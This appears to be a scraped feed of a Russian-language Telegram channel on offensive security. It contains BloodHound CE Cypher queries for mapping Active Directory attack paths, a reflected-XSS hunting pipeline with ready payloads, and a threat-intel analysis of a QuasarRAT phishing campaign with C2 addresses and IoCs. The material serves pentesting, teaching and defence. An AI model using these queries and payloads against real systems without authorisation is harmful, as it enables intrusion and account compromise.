Fsecurity | HH

🔄

😉

BloodHound CE v7.3.1

Обновление инструмента для выявления связей и построения графов в 💻 Active Directory. Достаточно учетной записи доменного пользователя.
Отличный инструмент при пентесте 💻 AD среды.
Для сбора информации используются коллекторы bloodhound-ce или SharpHound

Bonus:

BadSuccessor query - dMSA (delegated Managed Service Account) в Windows Server 2025

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1.name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2.name IN dcs) RETURN c2.name

Установка:

curl -L https://ghst.ly/getbhce | docker compose -f - up

http://localhost:8080/ui/login

Логин admin и сгенерированный пароль

Для обновления переходим в директорию с docker-compose.yml и запускаем:

docker compose pull && docker compose up

Сбор информации:

python3 bloodhound-python -u domain_user -p 'P@ss' -ns 10.0.0.1 -d contoso.com -c all --dns-tcp

Neo4j запросы:

# Domain Admins и время установки пароля
MATCH (g:Group) WHERE g.name =~ "(?i).*DOMAIN ADMINS.*" WITH g MATCH (g)<-
[r:MemberOf*1..]-(u) RETURN u.name AS User,
datetime({epochSeconds:toInteger(u.pwdlastset)}) as passwordLastSet, datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset

# Сервисные УЗ, время установки пароля, дата создания
MATCH (u:User) WHERE u.hasspn=true AND (NOT u.name STARTS WITH 'KRBTGT') RETURN u.name
AS accountName, datetime({epochSeconds: toInteger(u.pwdlastset)}) AS passwordLastSet,
datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset

# Пользователи и описание
MATCH (u:User) RETURN u.name as username, u.description as description

# Domain Admins или Administrators с сессией исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (n:User)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-512' OR
g.objectid ENDS WITH '-544'
MATCH p = (c:Computer)-[:HasSession]->(n) WHERE NOT c.name in domainControllers return
p

# Неограниченное делегирование исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (c:Computer {unconstraineddelegation:true}) WHERE NOT c.name IN domainControllers
RETURN c

# Пользователи с ограниченным делегированием
MATCH p = ((u:User)-[r:AllowedToDelegate]->(c:Computer)) RETURN p

Подробный гайд:

➡️

The Ultimate Guide BHCE

➡️

Адаптация на русском

ADCS атаки:

➡️

Part 1

➡️

Part 2

➡️

Part 3

Ссылки:

💻

Home

💻

Download

➡️

Docs

P.S. Сам таки полностью перешел на CE версию и legacy использовать больше желания нет 👍😅

#bloodhound #pentest #active_directory #soft #bhce

✈️

Whitehat Lab

💬

Chat

Please open Telegram to view this post

VIEW IN TELEGRAM

115 views20:16

Fsecurity | HH

SecurityLab.ru

0day в вишлистах: хватит и одного запроса, чтобы ваш сайт лёг навсегда

🔗Ссылка:
https://www.securitylab.ru/news/559808.php?r=1

128 views08:03

Fsecurity | HH

Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

116 views08:09

Fsecurity | HH

SecurityLab.ru

Operation Endgame и RapTor: грандиозная зачистка показала, что анонимность в даркнете — больше не защита, а иллюзия

300 серверов, 650 доменов, 21 миллион евро — и это только начало.

🔗Ссылка:
https://www.securitylab.ru/news/559694.php?r=1

127 views10:12

Fsecurity | HH

SecurityLab.ru

Вчера — враги системы, сегодня — её главные защитники. Как хакеры стали элитой ИБ

Новая профессия, где не нужен даже университет.

🔗Ссылка:
https://www.securitylab.ru/news/559819.php

129 views12:11

Fsecurity | HH

www.opennet.ru

Уязвимость в MCP-сервере GitHub, приводящая к утечке информации из приватных репозиториев

В GitHub MCP Server, реализации протокола MCP (Model Context Protocol) от GitHub, выявлена уязвимость, позволяющая извлечь данные из приватных репозиториев пользователей, использующих AI-ассистенты для автоматизации работы с репозиториями.

🔗Ссылка:
https://opennet.ru/63322/

130 views14:18

Fsecurity | HH

Forwarded from Adaptix Framework

AdaptixC2 v0.5 is out

https://github.com/Adaptix-Framework/AdaptixC2

* Windows "gopher" agent
* Fast socks5 tunnels via "gopher" agent
* New Remote Terminal
* New Client side tunnels

More details in the changelog: https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.4-greater-than-v0.5

GitHub

GitHub - Adaptix-Framework/AdaptixC2: AdaptixC2 is a highly modular advanced redteam toolkit

AdaptixC2 is a highly modular advanced redteam toolkit - Adaptix-Framework/AdaptixC2

126 views16:04

Fsecurity | HH

Forwarded from 1N73LL1G3NC3

0:04

This media is not supported in your browser

VIEW IN TELEGRAM

dMSASync.py

P.S. I hope the last one (by @snovvcrash)

👍1

123 views18:08

Fsecurity | HH

Forwarded from Whitehat Lab

💻

PurpleSharp v1.3

Интересный инструмент для моделирования различных типов атак, с целью создания телеметрии в контролируемых средах 💻 Windows

❗️

47 уникальных атак

💻

Home

💻

AD Purple Team Playbook

#purpleteam #csharp #soft

✈️

Whitehat Lab

💬

Chat

Please open Telegram to view this post

VIEW IN TELEGRAM

140 views20:39

Fsecurity | HH

Хабр

Пишем на C самоизменяющуюся программу x86_64

«Зачем вообще писать программу, меняющую код в процессе выполнения? Это же ужасная идея!» Да, всё так и есть. Но это и хороший опыт. Такое делают только тогда, когда хотят что-то исследовать, или из...

🔗Ссылка:
https://habr.com/ru/companies/ruvds/articles/913546/

150 views08:03

Fsecurity | HH

Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

141 views08:04

Fsecurity | HH

🔗Ссылка:
https://securelist.ru/purerat-attacks-russian-organizations/112619/

137 views10:15

Fsecurity | HH

Хабр

Видеть инфраструктуру как хакер. От графа моделирования угроз к алгоритмам, которые находят маршруты атак на нем

Эта статья — логическое продолжение статьи Антона и Кости про управление маршрутами атак хакера ). Здесь мы расскажем о построении графа моделирования угроз и методах расчета путей атакующего на нем....

🔗Ссылка:
https://habr.com/ru/companies/pt/articles/913386/

141 views12:24

Fsecurity | HH

Хабр

Сравнительный обзор: Shodan, ZoomEye, Netlas, Censys, FOFA и Criminal IP

Гайнуллина Екатерина Инженер по информационной безопасности, Отдел развития Производственного департамента Security Vision Введение В современном интернете всё, что подключено к сети, может быть...

🔗Ссылка:
https://habr.com/ru/companies/securityvison/articles/913832/

146 views14:01

Fsecurity | HH

Хабр

Аудит информационной безопасности: комплексная модель оценки зрелости процессов

Вопрос зрелости практик информационной безопасности волнует практически каждую российскую компанию: кибератаки становятся изощреннее, требования регуляторов ужесточаются, а импортозамещение требует...

🔗Ссылка:
https://habr.com/ru/articles/913764/

182 views16:02

Fsecurity | HH

Google Cloud Blog

Mark Your Calendar: APT41 Innovative Tactics | Google Cloud Blog

🔗Ссылка:
https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics

142 views18:02

Fsecurity | HH

Forwarded from Whitehat Lab

kreep

BadSuccessor: Abusing dMSAs for AD Domination

After Akamai’s publication of BadSuccessor, I set out to research and reproduce the exploit. In this post I cover: an overview of the vulnerability as disclosed by Akamai researcher Yuval Gordon; how I stood up a Windows Server 2025 DC in my existing GOAD…

⚙️

BadSuccessor

Очень подробный research

#poc #windows #badsuccessor

✈️

Whitehat Lab

💬

Chat

Please open Telegram to view this post

VIEW IN TELEGRAM

❤1

135 views20:53

Fsecurity | HH

Forwarded from PurpleBear (Vadim Shelest)

Всем привет!
После небольшого перерыва возвращаюсь с регулярными постами и сегодня мы поговорим про...Reflected XSS😂

В качестве предисловия, среди аудитории канала большое количество матерых пентестеров и баг-хантеров, но и много новичков, которые только начинают свой путь в нашей отрасли и этот пост в большей степени для них, так как все когда-то учились. Да и в целом практически каждое техническое интервью я предпочитаю начинать с вопросов про XSS, только контекст обычно зависит от грейда кандидата.
Вообще XSS-кам, как классу уязвимостей предcказывали быструю смерть еще в 2014, когда Content Security Policy 2.0 стал фактически стандартом, но в классификации OWASP-10 от 2021 года XSS уверенно удерживает 3-е место на ряду с другими инъекциям, посмотрим как ситуация изменится в этом году.

💥Таким образом XSS:
✅ Распространенная уязвимость
✅ Дает серьезный импакт в определенных условиях
✅ Автоматизация поиска и эксплуатации

❓Как искать?
✅ Собираем все url'ы с параметрами ((?q=, ?id=, и тд) с помощью:
🔧 Paramspider - использует web.archive.org для поиска url доменов из списка
paramspider -l targets.txt
🔧 Gospider - довольно быстрый веб краулер на Go

gospider -S targets.txt -a -w -r --js --sitemap --robots -d 2 -c 10 -t 20 -K 10 \
--blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg|js|dat|pdf|webp|woff|woff2|tif|ttf|tiff2)" \
-q | tee gospider-out.txt

✅ Объединяем и сортируем выхлопы в один файлик:
cd paramspider/

output
cat *.txt > paramspider_out.txt
cat paramspider_out.txt | sort -u | tee tragets_url.txt

✅ Определяем живые хосты с помощью httpx
httpx -l tragets_url.txt --threads 250 -o live_tragets_url.txt
✅ Сортируем выхлоп по расширениям:

cat live_tragets_url.txt | grep -i -e '\.php$' | tee live_tragets_url_php.txt
cat live_tragets_url.txt | grep -i -e '\.asp$' | tee live_tragets_url_asp.txt 
cat live_tragets_url.txt | grep -i -e '\.aspx$' | tee live_tragets_url_aspx.txt 
cat live_tragets_url.txt

|

grep -i -e '\.jsp$' | tee live_tragets_url_jsp.txt 
cat live_tragets_url.txt | grep -i -e '\.do$' | tee live_tragets_url_do.txt

✅ Ищем отраженные параметры с помощью:
🔧 Dalfox
dalfox file live_tragets_url_jsp.txt --skip-xss-scanning -o live_tragets_url_jsp_reflecting.txt
✅ Определяем отраженный контекст:
🔖 Reflected Between HTML Tags
<p>"><zxcvbro>Bro</p>
🔧 Используем полезную нагрузку:

<img src=x onerror=prompt(1)>
<details open ontoggle=prompt(origin)>
<svg onload=confirm(1)>

🔐 Reflected Inside HTML Tag Attributes
<input value="><zxcvbro>Bro">
🔧 Используем полезную нагрузку:

" autofocus onfocus=alert(document.domain) x="
"><script>alert(1)</script>

📜 Reflected Inside JavaScript

<script>
var input = '"><zxcvbro>Bro';
</script>

🔧 Используем полезную нагрузку:

';alert(1)//
'-alert(1)-'
</script><img src=1 onerror=alert(1)>

✅ Сдаем багу
✅ Вы великолепны💸

GitHub

GitHub - devanshbatham/ParamSpider: Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing

Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing - devanshbatham/ParamSpider

🤣1

128 views08:04

Fsecurity | HH

Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

108 views08:07

Fsecurity | HH

Forwarded from ESCalator

Новая кампания PhaseShifters

👽

В течение мая группа киберразведки PT ESC фиксирует волну активности хакерской группировки PhaseShifters, о которой мы рассказывали в январе этого года.

Группировка проводит фишинговую рассылку, выдавая себя за Министерство образования и науки Российской Федерации. Для организации рассылки был зарегистрирован домен minobnauki.ru, MX-запись которого указывает на IP-адрес 193.124.33.207. На этом же сервере был размещен домен mail.min-prom.ru, с которого ранее PhaseShifters рассылала фишинговые письма от имени Минпромторга.

В теле фишинговых писем группировка прикладывает зашифрованный архив, внутри которого находится вредоносное ПО QuasarRAT, замаскированное под обычный документ DOCX. Внутри QuasarRAT содержит основное письмо, а рядом в архиве лежит отдельный документ-приманка, служащий приложением к основному файлу.

Во время распаковки и запуска вредоноса выполняются проверки на наличие разных антивирусных решений по ключам bdservicehost SophosHealth AvastUI AVGUI nsWscSvc ekrn, в зависимости от чего немного меняются параметры запуска.

Скрытая полезная нагрузка QuasarRAT доставляется в несколько фрагментов с расширением .adt, а затем собирается в единый исполняемый файл при помощи последовательного объединения командой

cmd /c copy /b ..\Quiet.adt + ..\Achievements.adt + ..\Yen.adt + … + ..\Panic.adt k

После успешного объединения фрагментов вредоносная программа закрепляется в системе через копирование ярлыка в папку автозагрузки пользователя, что обеспечивает его автоматический запуск при входе в систему.

Для маскировки атакующий процесс создает экземпляр RegAsm.exe, в который внедряется QuasarRAT, после чего устанавливается защищенное соединение с командным сервером 5.8.11.119:4782, на котором размещен сертификат QuasarRAT.

При этом Regasm расположен не по стандартному пути, а копируется в другую папку, откуда уже запускается для последующего инжектирования в него кода. Такие варианты запуска позволяют строить детекты или хантинг системных бинарей, запускаемых из нестандартных расположений.

Данная C2-инфраструктура уже применялась этой группировкой в предыдущих операциях, однако в тех атаках в конфигурации серверов использовались домены thelightpower.info и crostech.ru.

При анализе паттернов регистрации фишинговых доменов также выявлено, что злоумышленники предпочитают использовать IP-адреса из автономной системы AS41745 (Baykov Ilya Sergeevich).

IoCs:

2b7004cb00d58967c7d6677495d3422e
0bbb3a2ac9ba7d14a784cbc2519fbd64
40ef2615afb15f61072d7cea9b1a856a
681af8a70203832f9b8de10a8d51860a

Prilozenie_k_pis_mu.docx
Pis_mo_zapros_na_predpriatia_OPK.doc.exe.exe
Исходящий от 26.05.2025.7z

193.124.33.207
minobnauki.ru
5.8.11.119
min-prom.ru
mail.min-prom.ru
superjoke.ru
forum-drom.ru
cloud-telegram.ru
about-sport.ru

#TI #APT #Phishing
@ptescalator

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

135 views10:31

About

Blog

Apps

Platform